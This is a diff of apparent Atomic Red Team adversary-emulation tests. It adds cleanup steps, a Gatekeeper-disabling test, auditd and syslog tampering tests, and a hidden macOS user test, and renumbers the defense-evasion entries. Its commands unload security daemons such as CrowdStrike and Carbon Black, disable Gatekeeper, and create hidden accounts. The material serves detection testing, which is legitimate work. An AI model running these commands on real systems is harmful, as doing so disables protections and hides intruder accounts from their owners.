-- [Atomic Test #22 - Tamper with Windows Defender Evade Scanning -Extension](#atomic-test-22---tamper-with-windows-defender-evade-scanning--extension)
+- [Atomic Test #22 - Tamper with Windows Defender Evade Scanning -Folder](#atomic-test-22---tamper-with-windows-defender-evade-scanning--folder)
 
-- [Atomic Test #23 - Tamper with Windows Defender Evade Scanning -Process](#atomic-test-23---tamper-with-windows-defender-evade-scanning--process)
+- [Atomic Test #23 - Tamper with Windows Defender Evade Scanning -Extension](#atomic-test-23---tamper-with-windows-defender-evade-scanning--extension)
+
+- [Atomic Test #24 - Tamper with Windows Defender Evade Scanning -Process](#atomic-test-24---tamper-with-windows-defender-evade-scanning--process)
 
 
 <br/>
@@ -178,13 +180,19 @@ Disables Carbon Black Response
 
 
 
-#### Attack Commands: Run with `sh`! 
+#### Attack Commands: Run with `sh`!  Elevation Required (e.g. root or admin) 
 
 
 ```sh
 sudo launchctl unload /Library/LaunchDaemons/com.carbonblack.daemon.plist
+sudo launchctl unload /Library/LaunchDaemons/com.carbonblack.defense.daemon.plist
 ```
 
+#### Cleanup Commands:
+```sh
+sudo launchctl load -w /Library/LaunchDaemons/com.carbonblack.daemon.plist
+sudo launchctl load -w /Library/LaunchDaemons/com.carbonblack.defense.daemon.plist
+```
 
 
 
@@ -202,13 +210,17 @@ Disables LittleSnitch
 
 
 
-#### Attack Commands: Run with `sh`! 
+#### Attack Commands: Run with `sh`!  Elevation Required (e.g. root or admin) 
 
 
 ```sh
 sudo launchctl unload /Library/LaunchDaemons/at.obdev.littlesnitchd.plist
 ```
 
+#### Cleanup Commands:
+```sh
+sudo launchctl load -w /Library/LaunchDaemons/at.obdev.littlesnitchd.plist
+```
 
 
 
@@ -226,13 +238,17 @@ Disables OpenDNS Umbrella
 
 
 
-#### Attack Commands: Run with `sh`! 
+#### Attack Commands: Run with `sh`!  Elevation Required (e.g. root or admin) 
 
 
 ```sh
 sudo launchctl unload /Library/LaunchDaemons/com.opendns.osx.RoamingClientConfigUpdater.plist
 ```
 
+#### Cleanup Commands:
+```sh
+sudo launchctl load -w /Library/LaunchDaemons/com.opendns.osx.RoamingClientConfigUpdater.plist
+```
 
 
 
@@ -241,7 +257,35 @@ sudo launchctl unload /Library/LaunchDaemons/com.opendns.osx.RoamingClientConfig
 <br/>
 <br/>
 
-## Atomic Test #8 - Stop and unload Crowdstrike Falcon on macOS
+## Atomic Test #8 - Disable macOS Gatekeeper
+Disables macOS Gatekeeper
+
+**Supported Platforms:** macOS
+
+
+
+
+
+#### Attack Commands: Run with `sh`!  Elevation Required (e.g. root or admin) 
+
+
+```sh
+sudo spctl --master-disable
+```
+
+#### Cleanup Commands:
+```sh
+sudo spctl --master-enable
+```
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #9 - Stop and unload Crowdstrike Falcon on macOS
 Stop and unload Crowdstrike Falcon daemons falcond and userdaemon on macOS
 
 **Supported Platforms:** macOS
@@ -264,6 +308,11 @@ sudo launchctl unload #{falcond_plist}
 sudo launchctl unload #{userdaemon_plist}
 ```
 
+#### Cleanup Commands:
+```sh
+sudo launchctl load -w #{falcond_plist}
+sudo launchctl load -w #{userdaemon_plist}
+```
 
 
 
@@ -272,7 +321,7 @@ sudo launchctl unload #{userdaemon_plist}
 <br/>
 <br/>
 
-## Atomic Test #9 - Unload Sysmon Filter Driver
+## Atomic Test #10 - Unload Sysmon Filter Driver
 Unloads the Sysinternals Sysmon filter driver without stopping the Sysmon service. To verify successful execution, o verify successful execution,
 run the prereq_command's and it should fail with an error of "sysmon filter must be loaded".
 
@@ -343,7 +392,7 @@ sysmon -accepteula -i
 <br/>
 <br/>
 
-## Atomic Test #10 - Uninstall Sysmon
+## Atomic Test #11 - Uninstall Sysmon
 Uninstall Sysinternals Sysmon for Defense Evasion
 
 **Supported Platforms:** Windows
@@ -401,7 +450,7 @@ cmd /c sysmon -i -accepteula
 <br/>
 <br/>
 
-## Atomic Test #11 - AMSI Bypass - AMSI InitFailed
+## Atomic Test #12 - AMSI Bypass - AMSI InitFailed
 Any easy way to bypass AMSI inspection is it patch the dll in memory setting the "amsiInitFailed" function to true.
 Upon execution, no output is displayed.
 
@@ -432,7 +481,7 @@ https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/
 <br/>
 <br/>
 
-## Atomic Test #12 - AMSI Bypass - Remove AMSI Provider Reg Key
+## Atomic Test #13 - AMSI Bypass - Remove AMSI Provider Reg Key
 With administrative rights, an adversary can remove the AMSI Provider registry key in HKLM\Software\Microsoft\AMSI to disable AMSI inspection.
 This test removes the Windows Defender provider registry key. Upon execution, no output is displayed.
 Open Registry Editor and navigate to "HKLM:\SOFTWARE\Microsoft\AMSI\Providers\" to verify that it is gone.
@@ -462,7 +511,7 @@ New-Item -Path "HKLM:\SOFTWARE\Microsoft\AMSI\Providers" -Name "{2781761E-28E0-4
 <br/>
 <br/>
 
-## Atomic Test #13 - Disable Arbitrary Security Windows Service
+## Atomic Test #14 - Disable Arbitrary Security Windows Service
 With administrative rights, an adversary can disable Windows Services related to security products. This test requires McAfeeDLPAgentService to be installed.
 Change the service_name input argument for your AV solution. Upon exeuction, infomration will be displayed stating the status of the service.
 To verify that the service has stopped, run "sc query McAfeeDLPAgentService"
@@ -499,7 +548,7 @@ net.exe start #{service_name} >nul 2>&1
 <br/>
 <br/>
 
-## Atomic Test #14 - Tamper with Windows Defender ATP PowerShell
+## Atomic Test #15 - Tamper with Windows Defender ATP PowerShell
 Attempting to disable scheduled scanning and other parts of windows defender atp. Upon execution Virus and Threat Protection will show as disabled
 in Windows settings.
 
@@ -534,7 +583,7 @@ Set-MpPreference -DisableBlockAtFirstSeen 0
 <br/>
 <br/>
 
-## Atomic Test #15 - Tamper with Windows Defender Command Prompt
+## Atomic Test #16 - Tamper with Windows Defender Command Prompt
 Attempting to disable scheduled scanning and other parts of windows defender atp. These commands must be run as System, so they still fail as administrator.
 However, adversaries do attempt to perform this action so monitoring for these command lines can help alert to other bad things going on. Upon execution, "Access Denied"
 will be displayed twice and the WinDefend service status will be displayed.
@@ -567,7 +616,7 @@ sc config WinDefend start=enabled >nul 2>&1
 <br/>
 <br/>
 
-## Atomic Test #16 - Tamper with Windows Defender Registry
+## Atomic Test #17 - Tamper with Windows Defender Registry
 Disable Windows Defender from starting after a reboot. Upen execution, if the computer is rebooted the entire Virus and Threat protection window in Settings will be
 grayed out and have no info.
 
@@ -596,7 +645,7 @@ Set-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name Disa
 <br/>
 <br/>
 
-## Atomic Test #17 - Disable Microsoft Office Security Features
+## Atomic Test #18 - Disable Microsoft Office Security Features
 Gorgon group may disable Office security features so that their code can run. Upon execution, an external document will not
 show any warning before editing the document.
 
@@ -635,7 +684,7 @@ Remove-Item -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security\Protected
 <br/>
 <br/>
 
-## Atomic Test #18 - Remove Windows Defender Definition Files
+## Atomic Test #19 - Remove Windows Defender Definition Files
 Removing definition files would cause ATP to not fire for AntiMalware. Check MpCmdRun.exe man page for info on all arguments.
 On later viersions of windows (1909+) this command fails even with admin due to inusfficient privelages. On older versions of windows the
 command will say completed.
@@ -663,7 +712,7 @@ https://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-
 <br/>
 <br/>
 
-## Atomic Test #19 - Stop and Remove Arbitrary Security Windows Service
+## Atomic Test #20 - Stop and Remove Arbitrary Security Windows Service
 Beginning with Powershell 6.0, the Stop-Service cmdlet sends a stop message to the Windows Service Controller for each of the specified services. The Remove-Service cmdlet removes a Windows service in the registry and in the service database.
 
 **Supported Platforms:** Windows
@@ -693,7 +742,7 @@ Remove-Service -Name #{service_name}
 <br/>
 <br/>
 
-## Atomic Test #20 - Uninstall Crowdstrike Falcon on Windows
+## Atomic Test #21 - Uninstall Crowdstrike Falcon on Windows
 Uninstall Crowdstrike Falcon. If the WindowsSensor.exe path is not provided as an argument we need to search for it. Since the executable is located in a folder named with a random guid we need to identify it before invoking the uninstaller.
 
 **Supported Platforms:** Windows
@@ -722,7 +771,7 @@ if (Test-Path "#{falcond_path}") {. "#{falcond_path}" /repair /uninstall /quiet
 <br/>
 <br/>
 
-## Atomic Test #21 - Tamper with Windows Defender Evade Scanning -Folder
+## Atomic Test #22 - Tamper with Windows Defender Evade Scanning -Folder
 Malware can exclude a specific path from being scanned and evading detection. 
 Upon successul execution, the file provided should be on the list of excluded path. 
 To check the exclusion list using poweshell (Get-MpPreference).ExclusionPath
@@ -759,7 +808,7 @@ Remove-MpPreference -ExclusionPath $excludedpath
 <br/>
 <br/>
 
-## Atomic Test #22 - Tamper with Windows Defender Evade Scanning -Extension
+## Atomic Test #23 - Tamper with Windows Defender Evade Scanning -Extension
 Malware can exclude specific extensions from being scanned and evading detection. 
 Upon successful execution, the extension(s) should be on the list of excluded extensions.
 To check the exclusion list using poweshell  (Get-MpPreference).ExclusionExtension.
@@ -796,7 +845,7 @@ Remove-MpPreference -ExclusionExtension  $excludedExts
 <br/>
 <br/>
 
-## Atomic Test #23 - Tamper with Windows Defender Evade Scanning -Process
+## Atomic Test #24 - Tamper with Windows Defender Evade Scanning -Process
 Malware can exclude specific processes from being scanned and evading detection.
 Upon successful execution, the process(es) should be on the list of excluded processes. 
 To check the exclusion list using poweshell  (Get-MpPreference).ExclusionProcess."

atomics/T1562.001/T1562.001.yaml

@@ -69,7 +69,12 @@ atomic_tests:
   executor:
     command: |
       sudo launchctl unload /Library/LaunchDaemons/com.carbonblack.daemon.plist
+      sudo launchctl unload /Library/LaunchDaemons/com.carbonblack.defense.daemon.plist
+    cleanup_command: |
+      sudo launchctl load -w /Library/LaunchDaemons/com.carbonblack.daemon.plist
+      sudo launchctl load -w /Library/LaunchDaemons/com.carbonblack.defense.daemon.plist
     name: sh
+    elevation_required: true
 - name: Disable LittleSnitch
   auto_generated_guid: 62155dd8-bb3d-4f32-b31c-6532ff3ac6a3
   description: |
@@ -79,7 +84,10 @@ atomic_tests:
   executor:
     command: |
       sudo launchctl unload /Library/LaunchDaemons/at.obdev.littlesnitchd.plist
+    cleanup_command: |
+      sudo launchctl load -w /Library/LaunchDaemons/at.obdev.littlesnitchd.plist
     name: sh
+    elevation_required: true
 - name: Disable OpenDNS Umbrella
   auto_generated_guid: 07f43b33-1e15-4e99-be70-bc094157c849
   description: |
@@ -89,7 +97,23 @@ atomic_tests:
   executor:
     command: |
       sudo launchctl unload /Library/LaunchDaemons/com.opendns.osx.RoamingClientConfigUpdater.plist
+    cleanup_command: |
+      sudo launchctl load -w /Library/LaunchDaemons/com.opendns.osx.RoamingClientConfigUpdater.plist
     name: sh
+    elevation_required: true
+- name: Disable macOS Gatekeeper
+  auto_generated_guid: 2a821573-fb3f-4e71-92c3-daac7432f053
+  description: |
+    Disables macOS Gatekeeper
+  supported_platforms:
+  - macos
+  executor:
+    command: |
+      sudo spctl --master-disable
+    cleanup_command: |
+      sudo spctl --master-enable
+    name: sh
+    elevation_required: true
 - name: Stop and unload Crowdstrike Falcon on macOS
   auto_generated_guid: b3e7510c-2d4c-4249-a33f-591a2bc83eef
   description: |
@@ -109,6 +133,9 @@ atomic_tests:
     command: |
       sudo launchctl unload #{falcond_plist}
       sudo launchctl unload #{userdaemon_plist}
+    cleanup_command: |
+      sudo launchctl load -w #{falcond_plist}
+      sudo launchctl load -w #{userdaemon_plist}
     name: sh
     elevation_required: true
 - name: Unload Sysmon Filter Driver

atomics/T1562.006/T1562.006.md

@@ -0,0 +1,111 @@
+# T1562.006 - Indicator Blocking
+## [Description from ATT&CK](https://attack.mitre.org/techniques/T1562/006)
+<blockquote>An adversary may attempt to block indicators or events typically captured by sensors from being gathered and analyzed. This could include maliciously redirecting (Citation: Microsoft Lamin Sept 2017) or even disabling host-based sensors, such as Event Tracing for Windows (ETW),(Citation: Microsoft About Event Tracing 2018) by tampering settings that control the collection and flow of event telemetry. (Citation: Medium Event Tracing Tampering 2018) These settings may be stored on the system in configuration files and/or in the Registry as well as being accessible via administrative utilities such as [PowerShell](https://attack.mitre.org/techniques/T1059/001) or [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047).
+
+ETW interruption can be achieved multiple ways, however most directly by defining conditions using the [PowerShell](https://attack.mitre.org/techniques/T1059/001) <code>Set-EtwTraceProvider</code> cmdlet or by interfacing directly with the Registry to make alterations.
+
+In the case of network-based reporting of indicators, an adversary may block traffic associated with reporting to prevent central analysis. This may be accomplished by many means, such as stopping a local process responsible for forwarding telemetry and/or creating a host-based firewall rule to block traffic to specific hosts responsible for aggregating events, such as security information and event management (SIEM) products. </blockquote>
+
+## Atomic Tests
+
+- [Atomic Test #1 - Auditing Configuration Changes on Linux Host](#atomic-test-1---auditing-configuration-changes-on-linux-host)
+
+- [Atomic Test #2 - Lgging Configuration Changes on Linux Host](#atomic-test-2---lgging-configuration-changes-on-linux-host)
+
+
+<br/>
+
+## Atomic Test #1 - Auditing Configuration Changes on Linux Host
+Emulates modification of auditd configuration files
+
+**Supported Platforms:** Linux
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value | 
+|------|-------------|------|---------------|
+| audisp_config_file_name | The name of the audispd configuration file to be changed | string | audispd.conf|
+| auditd_config_file_name | The name of the auditd configuration file to be changed | string | auditd.conf|
+| libaudit_config_file_name | The name of the libaudit configuration file to be changed | string | libaudit.conf|
+
+
+#### Attack Commands: Run with `bash`!  Elevation Required (e.g. root or admin) 
+
+
+```bash
+sed -i '$ a #art_test_1562_006_1' /etc/audisp/#{audisp_config_file_name}
+if [ -f "/etc/#{auditd_config_file_name}" ];
+then sed -i '$ a #art_test_1562_006_1' /etc/#{auditd_config_file_name}
+else sed -i '$ a #art_test_1562_006_1' /etc/audit/#{auditd_config_file_name}
+fi 
+sed -i '$ a #art_test_1562_006_1' /etc/#{libaudit_config_file_name}
+```
+
+#### Cleanup Commands:
+```bash
+sed -i '$ d' /etc/audisp/#{audisp_config_file_name}
+if [ -f "/etc/#{auditd_config_file_name}" ];
+then sed -i '$ d' /etc/#{auditd_config_file_name}
+else sed -i '$ d' /etc/audit/#{auditd_config_file_name}
+fi
+sed -i '$ d' /etc/#{libaudit_config_file_name}
+```
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #2 - Lgging Configuration Changes on Linux Host
+Emulates modification of syslog configuration.
+
+**Supported Platforms:** Linux
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value | 
+|------|-------------|------|---------------|
+| syslog_config_file_name | The name of the syslog configuration file to be changed | string | syslog.conf|
+| rsyslog_config_file_name | The name of the rsyslog configuration file to be changed | string | rsyslog.conf|
+| syslog_ng_config_file_name | The name of the syslog-ng configuration file to be changed | string | syslog-ng.conf|
+
+
+#### Attack Commands: Run with `bash`!  Elevation Required (e.g. root or admin) 
+
+
+```bash
+if [ -f "/etc/#{syslog_config_file_name}" ];
+then sed -i '$ a #art_test_1562_006_2' /etc/#{syslog_config_file_name}
+fi
+if [ -f "/etc/#{rsyslog_config_file_name}" ];
+then sed -i '$ a #art_test_1562_006_2' /etc/#{rsyslog_config_file_name}
+fi
+if [ -f "/etc/syslog-ng/#{syslog_ng_config_file_name}" ];
+then sed -i '$ a #art_test_1562_006_2' /etc/syslog-ng/#{syslog_ng_config_file_name}
+fi
+```
+
+#### Cleanup Commands:
+```bash
+if [ -f "/etc/#{syslog_config_file_name}" ];
+then sed -i '$ d' /etc/#{syslog_config_file_name}
+fi
+if [ -f "/etc/#{rsyslog_config_file_name}" ];
+then sed -i '$ d' /etc/#{rsyslog_config_file_name}
+fi
+if [ -f "/etc/syslog-ng/#{syslog_ng_config_file_name}" ];
+then sed -i '$ d' /etc/syslog-ng/#{syslog_ng_config_file_name}
+fi
+```
+
+
+
+
+
+<br/>

atomics/T1562.006/T1562.006.yaml

@@ -0,0 +1,82 @@
+attack_technique: T1562.006
+display_name: 'Impair Defenses: Indicator Blocking'
+atomic_tests:
+- name: 'Auditing Configuration Changes on Linux Host'
+  auto_generated_guid: 212cfbcf-4770-4980-bc21-303e37abd0e3
+  description: |
+    Emulates modification of auditd configuration files
+  supported_platforms:
+  - linux
+  input_arguments:
+    audisp_config_file_name:
+      description: The name of the audispd configuration file to be changed
+      type: string
+      default: audispd.conf
+    auditd_config_file_name:
+      description: The name of the auditd configuration file to be changed
+      type: string
+      default: auditd.conf
+    libaudit_config_file_name:
+      description: The name of the libaudit configuration file to be changed
+      type: string
+      default: libaudit.conf
+  executor:
+    command: |
+      sed -i '$ a #art_test_1562_006_1' /etc/audisp/#{audisp_config_file_name}
+      if [ -f "/etc/#{auditd_config_file_name}" ];
+      then sed -i '$ a #art_test_1562_006_1' /etc/#{auditd_config_file_name}
+      else sed -i '$ a #art_test_1562_006_1' /etc/audit/#{auditd_config_file_name}
+      fi 
+      sed -i '$ a #art_test_1562_006_1' /etc/#{libaudit_config_file_name}
+    cleanup_command: |
+      sed -i '$ d' /etc/audisp/#{audisp_config_file_name}
+      if [ -f "/etc/#{auditd_config_file_name}" ];
+      then sed -i '$ d' /etc/#{auditd_config_file_name}
+      else sed -i '$ d' /etc/audit/#{auditd_config_file_name}
+      fi
+      sed -i '$ d' /etc/#{libaudit_config_file_name}
+    name: bash
+    elevation_required: true
+- name: 'Lgging Configuration Changes on Linux Host'
+  auto_generated_guid: 7d40bc58-94c7-4fbb-88d9-ebce9fcdb60c
+  description: |
+    Emulates modification of syslog configuration.
+  supported_platforms:
+  - linux
+  input_arguments:
+    syslog_config_file_name:
+      description: The name of the syslog configuration file to be changed
+      type: string
+      default: syslog.conf
+    rsyslog_config_file_name:
+      description: The name of the rsyslog configuration file to be changed
+      type: string
+      default: rsyslog.conf
+    syslog_ng_config_file_name:
+      description: The name of the syslog-ng configuration file to be changed
+      type: string
+      default: syslog-ng.conf
+  executor:
+    command: |
+      if [ -f "/etc/#{syslog_config_file_name}" ];
+      then sed -i '$ a #art_test_1562_006_2' /etc/#{syslog_config_file_name}
+      fi
+      if [ -f "/etc/#{rsyslog_config_file_name}" ];
+      then sed -i '$ a #art_test_1562_006_2' /etc/#{rsyslog_config_file_name}
+      fi
+      if [ -f "/etc/syslog-ng/#{syslog_ng_config_file_name}" ];
+      then sed -i '$ a #art_test_1562_006_2' /etc/syslog-ng/#{syslog_ng_config_file_name}
+      fi
+    cleanup_command: |
+      if [ -f "/etc/#{syslog_config_file_name}" ];
+      then sed -i '$ d' /etc/#{syslog_config_file_name}
+      fi
+      if [ -f "/etc/#{rsyslog_config_file_name}" ];
+      then sed -i '$ d' /etc/#{rsyslog_config_file_name}
+      fi
+      if [ -f "/etc/syslog-ng/#{syslog_ng_config_file_name}" ];
+      then sed -i '$ d' /etc/syslog-ng/#{syslog_ng_config_file_name}
+      fi
+    name: bash
+    elevation_required: true
+  

atomics/T1564.002/T1564.002.md

@@ -6,13 +6,15 @@ There is a property value in <code>/Library/Preferences/com.apple.loginwindow</c
 
 ## Atomic Tests
 
-- [Atomic Test #1 - Hidden Users](#atomic-test-1---hidden-users)
+- [Atomic Test #1 - Create Hidden User using UniqueID < 500](#atomic-test-1---create-hidden-user-using-uniqueid--500)
+
+- [Atomic Test #2 - Create Hidden User using IsHidden option](#atomic-test-2---create-hidden-user-using-ishidden-option)
 
 
 <br/>
 
-## Atomic Test #1 - Hidden Users
-Add a hidden user on MacOS
+## Atomic Test #1 - Create Hidden User using UniqueID < 500
+Add a hidden user on macOS using Unique ID < 500 (users with that ID are hidden by default)
 
 **Supported Platforms:** macOS
 
@@ -41,4 +43,37 @@ sudo dscl . -delete /Users/#{user_name}
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #2 - Create Hidden User using IsHidden option
+Add a hidden user on macOS using IsHidden optoin
+
+**Supported Platforms:** macOS
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value | 
+|------|-------------|------|---------------|
+| user_name | username to add | string | APT|
+
+
+#### Attack Commands: Run with `sh`!  Elevation Required (e.g. root or admin) 
+
+
+```sh
+sudo dscl . -create /Users/#{user_name} IsHidden 1
+```
+
+#### Cleanup Commands:
+```sh
+sudo dscl . -delete /Users/#{user_name}
+```
+
+
+
+
+
 <br/>

atomics/T1564.002/T1564.002.yaml

@@ -1,10 +1,10 @@
 attack_technique: T1564.002
 display_name: 'Hide Artifacts: Hidden Users'
 atomic_tests:
-- name: Hidden Users
+- name: Create Hidden User using UniqueID < 500
   auto_generated_guid: 4238a7f0-a980-4fff-98a2-dfc0a363d507
   description: |
-    Add a hidden user on MacOS
+    Add a hidden user on macOS using Unique ID < 500 (users with that ID are hidden by default)
   supported_platforms:
   - macos
   input_arguments:
@@ -19,3 +19,21 @@ atomic_tests:
       sudo dscl . -delete /Users/#{user_name}
     elevation_required: true
     name: sh
+- name: Create Hidden User using IsHidden option
+  auto_generated_guid: de87ed7b-52c3-43fd-9554-730f695e7f31
+  description: |
+    Add a hidden user on macOS using IsHidden optoin
+  supported_platforms:
+  - macos
+  input_arguments:
+    user_name:
+      description: username to add
+      type: string
+      default: APT
+  executor:
+    command: |
+      sudo dscl . -create /Users/#{user_name} IsHidden 1
+    cleanup_command: |
+      sudo dscl . -delete /Users/#{user_name}
+    elevation_required: true
+    name: sh

atomics/used_guids.txt

@@ -1,38 +1,32 @@
-41410c60-614d-4b9d-b66e-b0192dd9c597
-02ea31cb-3b4c-4a2d-9bf1-e4e70ebcf5d0
-c51cec55-28dd-4ad2-9461-1eacbc82c3a0
-cde3c2af-3485-49eb-9c1f-0ed60e9cc0af
-7af2b51e-ad1c-498c-aca8-d3290c19535a
-66fb0bc1-3c3f-47e9-a298-550ecfefacbc
-96345bfc-8ae7-4b6a-80b7-223200f24ef9
 0f7c5301-6859-45ba-8b4d-1fac30fc31ed
-5c2571d0-1572-416d-9676-812e64ca9f44
 0be2230c-9ab3-4ac2-8826-3199b9a0ebf8
 2536dee2-12fb-459a-8c37-971844fa73be
 7ae7102c-a099-45c8-b985-4c7a2d05790d
 dea6c349-f1c6-44f3-87a1-1ed33a59a607
 453acf13-1dbd-47d7-b28a-172ce9228023
-2364e33d-ceab-4641-8468-bfb1d7cc2723
+c37bc535-5c62-4195-9cc3-0517673171d8
+5c2571d0-1572-416d-9676-812e64ca9f44
+a96872b2-cbf3-46cf-8eb4-27e8c0e85263
+a90c2f4d-6726-444e-99d2-a00cd7c20480
+804f28fc-68fc-40da-b5a2-e9d0bce5c193
 dcebead7-6c28-4b4b-bf3c-79deb1b1fc7f
 c6237146-9ea6-4711-85c9-c56d263a6b03
-870fe8fb-5e23-4f5f-b89d-dd7fe26f3b5f
-e9584f82-322c-474a-b831-940fd8b4455c
-c37bc535-5c62-4195-9cc3-0517673171d8
-a96872b2-cbf3-46cf-8eb4-27e8c0e85263
-8c05b133-d438-47ca-a630-19cc464c4622
-bf9f9d65-ee4d-4c3e-a843-777d04f19c38
-fb32c935-ee2e-454b-8fa3-1c46b42e8dfb
-d40da266-e073-4e5a-bb8b-2b385023e5f9
-c1402f7b-67ca-43a8-b5f3-3143abedc01b
+2364e33d-ceab-4641-8468-bfb1d7cc2723
+224f7de0-8f0a-4a94-b5d8-989b036c86da
+542bb97e-da53-436b-8e43-e0a7d31a6c24
+21748c28-2793-4284-9e07-d6d028b66702
+55295ab0-a703-433b-9ca4-ae13807de12f
+66fb0bc1-3c3f-47e9-a298-550ecfefacbc
+96345bfc-8ae7-4b6a-80b7-223200f24ef9
+9e2173c0-ba26-4cdf-b0ed-8c54b27e3ad6
+88f6327e-51ec-4bbf-b2e8-3fea534eab8b
 89676ba1-b1f8-47ee-b940-2e1a113ebc71
 5f864a3f-8ce9-45c0-812c-bdf7d8aeacc3
-ffe2346c-abd5-4b45-a713-bf5f1ebd573a
 fe94a1c3-3e22-4dc9-9fdf-3a8bdbc10dc4
 8f7578c4-9863-4d83-875c-a565573bbdf0
 dfb50072-e45a-4c75-a17e-a484809c8553
 75483ef8-f10f-444a-bf02-62eb0e48db6f
 8e4e1985-9a19-4529-b4b8-b7a49ff87fae
-3309f53e-b22b-4eb6-8fd2-a6cf58b355a9
 970ab6a1-0157-4f3f-9a73-ec4166754b23
 038263cb-00f4-4b0a-98ae-0696c67e1752
 c141bbdb-7fca-4254-9fd6-f47e79447e17
@@ -46,28 +40,33 @@ f1bf6c8f-9016-4edf-aff9-80b65f5d711f
 acb6b1ff-e2ad-4d64-806c-6c35fe73b951
 96db2632-8417-4dbb-b8bb-a8b92ba391de
 baa01aaa-5e13-45ec-8a0d-e46c93c9760f
-0286eb44-e7ce-41a0-b109-3da516e05a5f
-8dd61a55-44c6-43cc-af0c-8bdda276860c
-01df0353-d531-408d-a0c5-3161bf822134
-d1334303-59cb-4a03-8313-b3e24d02c198
-ce4fc678-364f-4282-af16-2fb4c78005ce
-cfdc954d-4bb0-4027-875b-a1893ce406f2
+95e19466-469e-4316-86d2-1dc401b5a959
+9c780d3d-3a14-4278-8ee5-faaeb2ccfbe0
+355d4632-8cb9-449d-91ce-b566d0253d3e
+7382a43e-f19c-46be-8f09-5c63af7d3e2b
+3386975b-367a-4fbb-9d77-4dcf3639ffd3
+514e9cd7-9207-4882-98b1-c8f791bae3c5
+0eb03d41-79e4-4393-8e57-6344856be1cf
+d41aaab5-bdfe-431d-a3d5-c29e9136ff46
+6dc74eb1-c9d6-4c53-b3b5-6f50ae339673
+9059e8de-3d7d-4954-a322-46161880b9cf
+5295bd61-bd7e-4744-9d52-85962a4cf2d6
+efe86d95-44c4-4509-ae42-7bfd9d1f5b3d
+ffe2346c-abd5-4b45-a713-bf5f1ebd573a
+11c46cd8-e471-450e-acb8-52a1216ae6a4
+f06197f8-ff46-48c2-a0c6-afc1b50665e1
+b16ef901-00bb-4dda-b4fc-a04db5067e20
+4d46e16b-5765-4046-9f25-a600d3e65e4d
+ffcdbd6a-b0e8-487d-927a-09127fe9a206
+453614d8-3ba6-4147-acc0-7ec4b3e1faef
 f45df6be-2e1e-4136-a384-8f18ab3826fb
 a50d5a97-2531-499e-a1de-5544c74432c6
 450e7218-7915-4be4-8b9b-464a49eafcec
 f8c8a909-5f29-49ac-9244-413936ce6d1f
-9059e8de-3d7d-4954-a322-46161880b9cf
-6dc74eb1-c9d6-4c53-b3b5-6f50ae339673
-5cd59c3b-1375-4edf-9bac-5851c9915fca
-9bab84a1-08fd-4245-b681-e62c78283002
-5295bd61-bd7e-4744-9d52-85962a4cf2d6
 ab936c51-10f4-46ce-9144-e02137b2016a
-ed366cde-7d12-49df-a833-671904770b9f
-21caf58e-87ad-440c-a6b8-3ac259964003
 4c4959bf-addf-4b4a-be86-8d09cc1857aa
 2a9b677d-a230-44f4-ad86-782df1ef108c
-2382dee2-a75f-49aa-9378-f52df6ed3fb1
-873106b7-cfed-454b-8680-fa9f6400431c
+29857f27-a36f-4f7e-8084-4557cd6207ca
 5ba5a3d1-cf3c-4499-968a-a93155d1f717
 a315bfff-7a98-403b-b442-2ea1b255e556
 3a2a578b-0a01-46e4-92e3-62e2859b42f0
@@ -76,121 +75,53 @@ ac9d0fc3-8aa8-4ab5-b11f-682cd63b40aa
 bc15c13f-d121-4b1f-8c7d-28d95854d086
 c3d24a39-2bfe-4c6a-b064-90cd73896cb0
 83810c46-f45e-4485-9ab6-8ed0e9e6ed7f
+c7fa0c3b-b57f-4cba-9118-863bf4e653fc
+f9f2fe59-96f7-4a7d-ba9f-a9783200d4c9
+b721c6ef-472c-4263-a0d9-37f1f4ecff66
+89a7dd26-e510-4c9f-9b15-f3bae333360f
 d6042746-07d4-4c92-9ad8-e644c114a231
-fec27f65-db86-4c2d-b66c-61945aee87c2
 f047c7de-a2d9-406e-a62b-12a09d9516f4
-2cb98256-625e-4da9-9d44-f2e5f90b8bd5
-dade9447-791e-4c8f-b04b-3a35855dfa06
-5b6768e4-44d2-44f0-89da-a01d1430fd5e
-8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3
+97a48daa-8bca-4bc0-b1a9-c1d163e762de
+134627c3-75db-410e-bff8-7a920075f198
 7fe741f7-b265-4951-a7c7-320889083b3e
 9d04efee-eff5-4240-b8d2-07792b873608
 a5b2f6a0-24b4-493e-9590-c699f75723ca
-2bf62970-013a-4c74-b0a8-64030874e89a
-10a08978-2045-4d62-8c42-1957bbbea102
-0cb5ad48-7d61-48ac-bd4e-503d5b519dac
-11c46cd8-e471-450e-acb8-52a1216ae6a4
-f06197f8-ff46-48c2-a0c6-afc1b50665e1
-b16ef901-00bb-4dda-b4fc-a04db5067e20
-4d46e16b-5765-4046-9f25-a600d3e65e4d
+b5656f67-d67f-4de8-8e62-b5581630f528
 68e907da-2539-48f6-9fc9-257a78c05540
 515942b0-a09f-4163-a7bb-22fefb6f185f
+d696a3cb-d7a8-4976-8eb5-5af4abf2e3df
 c107778c-dcf5-47c5-af2e-1d058a3df3ea
 5750aa16-0e59-4410-8b9a-8a47ca2788e2
 718aebaa-d0e0-471a-8241-c5afa69c7414
 0fd48ef7-d890-4e93-a533-f7dedd5191d3
 b3bdfc91-b33e-4c6d-a5c8-d64bee0276b3
 9c8ef159-c666-472f-9874-90c8d60d136b
-f6786cc8-beda-4915-a4d6-ac2f193bb988
-7c3cb337-35ae-4d06-bf03-3032ed2ec268
 1d1abbd6-a3d3-4b2e-bef5-c59293f46eff
 dd4b4421-2e25-4593-90ae-7021947ad12e
 c403b5a4-b5fc-49f2-b181-d1c80d27db45
+f6786cc8-beda-4915-a4d6-ac2f193bb988
+7c3cb337-35ae-4d06-bf03-3032ed2ec268
 0940a971-809a-48f1-9c4d-b1d785e96ee5
 f069f0f1-baad-4831-aa2b-eddac4baac4a
 9ae28d3f-190f-4fa0-b023-c7bd3e0eabf2
-981e2942-e433-44e9-afc1-8c957a1496b6
